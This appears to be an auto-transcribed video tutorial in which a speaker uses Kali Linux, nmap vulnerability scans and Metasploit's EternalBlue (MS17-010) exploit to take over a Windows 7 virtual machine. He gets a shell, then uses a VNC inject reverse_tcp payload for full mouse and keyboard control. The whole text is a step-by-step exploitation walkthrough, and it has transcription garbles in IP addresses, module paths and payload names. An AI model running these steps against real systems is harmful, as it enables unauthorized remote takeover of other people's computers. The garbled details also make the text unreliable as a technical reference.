Hello guys, so this is my Kali Linux 2018.4. Now first of all what we have to do, we have to know the IP address of our Kali Linux. So for this the command is ifconfig, the command is ihcconfig, and the IP address as you can see is 192.160.14.111. So now we have to find the IPs that are connected to this network. So the command is nmap, the IP range will be 14.0/24. So we can see the connected networks to this IP range. So the scanning has been started. Just wait for a few minutes. And as you can see, 14.100, 14.132 and 14.111. So as you can see, the scanning has been done, and you can see the nmap scan for this IP address. There are several ports open. So this is our target IP, that is nmap. That is 192.160.14.109. So let's check it for the vulnerability if it is the Windows 7 machine or not. So for this, copy the IP address and the command is nmap --script for checking the vulnerability and the OS name, vulnerability, and the IP address we have copied. The target IP, that means the Windows 7 IP, vuln that is for vulnerability, and the IP address of the Windows 7 machine. So let's check it by scanning via nmap. It will see the vulnerability of the Windows 7 system, and also the ports are open. You can see ports over also that are open in the Windows 7 machine, that we can hack through this also. You can see the scanning has been done, and VMware, as I have hosted the Windows 7 machine via VMware, so it is showing VMware, and the risk factor of the Windows 7 machine is MS17010. So we have to hit it in this vulnerability. So let's search for the vulnerability in the Metasploit, as I have opened the Metasploit in the other tab. Just go to the other tab, and this is Metasploit. So you have to search for the exploit in here. So command is search MS17 010. So as you can see, the scanning has been done. I am using this payload, this exploit. So the command is use exploit /windows /smd /ms17 010. I'm going to use eternal blue. Just hit enter. After that, we have to check which options we have to give. So show options. You can see we have to give only the R host. There it is. So set R host, the IP of the Windows 7 machine, that is 14.109, and hit exploit. So the scanning is going on, and you will see the command session has been opened. Now we have got the shell session of this Windows 7 machine. So you have to we want a graphical interface. So for this, just we have to background this session. So press Ctrl Z for backgrounding the session. Now see by show options what you can see. Show options. As you can see, this exploit is using this payload, but for getting the VNC window, we have to set the payload to set windows, set payload, those windows /x64 / VNC inject / reverse _ TCP. We have to change the payload to generic shell reverse _ TCP from this. Now show options. And what you can see that elapsed has been given, but we have to only change the view only option so that we can edit also in the graphical user interface. Set view only to false and hit exploit. You will see the graphical interface of the Windows 7 machine. You can see session 2 is created in VNC viewer background. The VNC will open now. This is the VNC viewer. We have got the remote connection of the Windows 7 PC. Now we can use the mouse also. We can use the keyboard also for the Windows 7 machine from this Kali Linux machine. You can go to the start, all programs, and anything you want to do in this Windows 7 machine. So that's all for this video, guys. Thank you.